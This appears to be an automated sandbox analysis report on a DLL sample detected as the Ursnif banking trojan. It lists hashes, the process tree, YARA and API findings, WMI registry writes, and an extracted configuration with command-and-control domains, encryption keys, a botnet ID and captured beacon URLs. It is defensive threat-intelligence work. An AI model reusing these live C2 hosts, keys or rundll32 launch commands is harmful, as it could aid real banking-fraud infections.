Play interactive tour

Edit tour

Analysis Report HP7cjYBnlS

Overview

General Information

Sample Name:	HP7cjYBnlS (renamed file extension from none to dll)
Analysis ID:	430819
MD5:	b8bc8b1740b329ff2baf16bcee6ca23d
SHA1:	d9215e03d2ddae00041a4ddd731872025b3ce537
SHA256:	aafda6138e0a43b153cc003b11f3e5fa8bf9e929d2356ec536b931a0ce983aa1
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the installation date of Windows

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 2160 cmdline: loaddll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 5460 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5564 cmdline: rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1288 cmdline: rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Lastinch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3508 cmdline: rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Ownof MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5936 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 2396 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5936 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "U9rEBqXZSYCa5+IGIsh6bG+yCElOQeh3mm/EbofYWnWn8eEmiiYrJf4LFttt0DUA+39n8FZdgzQ8+SZc3rzhnMPMr8Z4fx3D+fbRo+I1MIlbD4szoKzRpMkx5aTB8Cab5I+DXW6gWdfQr7HECFEcTAwpyJLhfIGXn6KxgwFOnVndUgrjSYq7Gck569kPOO4YXnbUwt69XT2FKUKDeX2hms5/QtXX3Hh9nmWOhvUxbY98vRvvbsLlPzjNF7v0QGIh4X7uypp3Ivkr2P2sMxabdSYOW4HN4JM/VPPFS2qTgX6hwJ09dF8P8HXDM24KI8tEs5YG59SMhcwCDFrBdfAkYEtatx5JFUNCiZ8QoDq+MTA=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "5500", "server": "580", "serpent_key": "w81KRA2f0ixucq4e", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.375144383.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.456094378.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.375123704.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.375061576.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.473815277.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.456111628.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.375035453.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.456029858.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.375085386.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.456137723.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000002.476067221.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.375104521.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.456077100.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.375160465.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.456001052.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.375172121.0000000003A58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.456056228.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.455955678.0000000005BB8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 2160	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5564	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://authd.feronok.com/5FNMYYgHAZL8fVyyU/16CafLRrMTz3/QRf0T9yKnnG/48zYuAResxRN4Y/8IsjuLfvxqx5QmY_2	Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/ft4uMX2U8DExkako/7nz7XYcy_2FPVr_/2FPwc_2Fs5FKMespD3/eoY8gKUtH/5APsBMu_2FYgV7VnT01F/UNasB5xyXVRAz2U9YlK/vPhVaOevuoWXkOwOuvQxwX/WzTW2Vxlbm5Dm/rPytLuLu/KL_2FHSOlQc2K_2BpO7JML7/v1pC4egQVv/iWGaiNgaqJFCdjHoy/PoXO84M5LLuy/jOUqBl_2Bse/EY7p0c9R6kAidR/RKeKXozKr_2B2DMk4uhLx/44Gh2U87rhzhq5q8/e3uXzWyPgLhp7zv/L1Iu0qPLA6WpCvBUhY/ZBphUq1tO/a9IY_2Fv/fGT	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000005.00000003.328801653.0000000002F30000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "U9rEBqXZSYCa5+IGIsh6bG+yCElOQeh3mm/EbofYWnWn8eEmiiYrJf4LFttt0DUA+39n8FZdgzQ8+SZc3rzhnMPMr8Z4fx3D+fbRo+I1MIlbD4szoKzRpMkx5aTB8Cab5I+DXW6gWdfQr7HECFEcTAwpyJLhfIGXn6KxgwFOnVndUgrjSYq7Gck569kPOO4YXnbUwt69XT2FKUKDeX2hms5/QtXX3Hh9nmWOhvUxbY98vRvvbsLlPzjNF7v0QGIh4X7uypp3Ivkr2P2sMxabdSYOW4HN4JM/VPPFS2qTgX6hwJ09dF8P8HXDM24KI8tEs5YG59SMhcwCDFrBdfAkYEtatx5JFUNCiZ8QoDq+MTA=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "5500", "server": "580", "serpent_key": "w81KRA2f0ixucq4e", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Show sources

Source: authd.feronok.com

Virustotal: Detection: 12%

Perma Link

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_030839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

4_2_030839C5

Source: HP7cjYBnlS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: HP7cjYBnlS.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\doctor\223\Top\key\each M\Iron.pdb source: loaddll32.exe, 00000001.00000002.474423465.000000006E242000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.476442754.000000006E242000.00000002.00020000.sdmp, HP7cjYBnlS.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DBE2B FindFirstFileExW,FindNextFileW,FindClose,	1_2_6E1DBE2B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DBA6F FindFirstFileExW,	1_2_6E1DBA6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DBE2B FindFirstFileExW,FindNextFileW,FindClose,	4_2_6E1DBE2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DBA6F FindFirstFileExW,	4_2_6E1DBA6F

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /5FNMYYgHAZL8fVyyU/16CafLRrMTz3/QRf0T9yKnnG/48zYuAResxRN4Y/8IsjuLfvxqx5QmY_2BQXv/jhaYgnRoJXbt0p9E/b8fATrD6qQYegBk/Z_2BGMca1pIbKyE0_2/B6xQROT_2/FVtM7cI_2F4AqKBZTcM8/ka_2F9uVk0Uf7i421qg/djhua0iQVsNSQqZdHOVnOp/1bWWjsxwMvE9P/MwkEBGYh/46lRSAqS_2BR6Lm5JNn7FqF/Gnvaxpv6Hg/PmOIMmhyTSho2PVt_/2FS0IBXGm_2B/SjjfTOvQzGo/_2FqD_2BGuMeOB/vnbxHYtmqGY_2BlpC/_2BvpW HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ft4uMX2U8DExkako/7nz7XYcy_2FPVr_/2FPwc_2Fs5FKMespD3/eoY8gKUtH/5APsBMu_2FYgV7VnT01F/UNasB5xyXVRAz2U9YlK/vPhVaOevuoWXkOwOuvQxwX/WzTW2Vxlbm5Dm/rPytLuLu/KL_2FHSOlQc2K_2BpO7JML7/v1pC4egQVv/iWGaiNgaqJFCdjHoy/PoXO84M5LLuy/jOUqBl_2Bse/EY7p0c9R6kAidR/RKeKXozKr_2B2DMk4uhLx/44Gh2U87rhzhq5q8/e3uXzWyPgLhp7zv/L1Iu0qPLA6WpCvBUhY/ZBphUq1tO/a9IY_2Fv/fGT HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive

Source: msapplication.xml0.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: authd.feronok.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Jun 2021 01:05:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: {09EF2733-C841-11EB-90E4-ECF4BB862DED}.dat.23.dr	String found in binary or memory: http://authd.feronok.com/5FNMYYgHAZL8fVyyU/16CafLRrMTz3/QRf0T9yKnnG/48zYuAResxRN4Y/8IsjuLfvxqx5QmY_2
Source: msapplication.xml.23.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.23.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.23.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.23.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.23.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.23.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.23.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.23.dr	String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.375144383.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456094378.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375123704.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375061576.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.473815277.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456111628.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375035453.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456029858.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375085386.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456137723.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476067221.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375104521.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456077100.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375160465.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456001052.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375172121.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456056228.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.455955678.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5564, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.375144383.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456094378.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375123704.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375061576.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.473815277.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456111628.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375035453.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456029858.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375085386.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456137723.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476067221.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375104521.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456077100.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375160465.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456001052.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375172121.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456056228.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.455955678.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5564, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_030839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

4_2_030839C5

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B1B9C GetProcAddress,NtCreateSection,memset,	1_2_6E1B1B9C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B1EC7 NtMapViewOfSection,	1_2_6E1B1EC7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B2485 NtQueryVirtualMemory,	1_2_6E1B2485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03082D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_03082D06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03088005 NtQueryVirtualMemory,	4_2_03088005

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B2264	1_2_6E1B2264
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D1EB4	1_2_6E1D1EB4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1C5F80	1_2_6E1C5F80
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D1C73	1_2_6E1D1C73
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D1A41	1_2_6E1D1A41
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1C5B50	1_2_6E1C5B50
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D1800	1_2_6E1D1800
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1C248F	1_2_6E1C248F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D15CE	1_2_6E1D15CE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D25F2	1_2_6E1D25F2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1E325A	1_2_6E1E325A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1C5240	1_2_6E1C5240
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1EF260	1_2_6E1EF260
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D238D	1_2_6E1D238D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D2119	1_2_6E1D2119
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1E313A	1_2_6E1E313A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1C3163	1_2_6E1C3163
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03083109	4_2_03083109
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03087DE0	4_2_03087DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03082206	4_2_03082206
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D1EB4	4_2_6E1D1EB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C5F80	4_2_6E1C5F80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D1C73	4_2_6E1D1C73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C248F	4_2_6E1C248F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D15CE	4_2_6E1D15CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D25F2	4_2_6E1D25F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1E325A	4_2_6E1E325A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C5240	4_2_6E1C5240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D1A41	4_2_6E1D1A41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1EF260	4_2_6E1EF260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C5B50	4_2_6E1C5B50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D238D	4_2_6E1D238D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D1800	4_2_6E1D1800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D2119	4_2_6E1D2119
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1E313A	4_2_6E1E313A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C3163	4_2_6E1C3163

Source: HP7cjYBnlS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal80.troj.winDLL@12/22@2/1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0308513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_0308513E

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF911219CB699D8BEF.TMP

Jump to behavior

Source: HP7cjYBnlS.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Lastinch

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Lastinch
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Ownof
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5936 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Lastinch	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Ownof	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5936 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

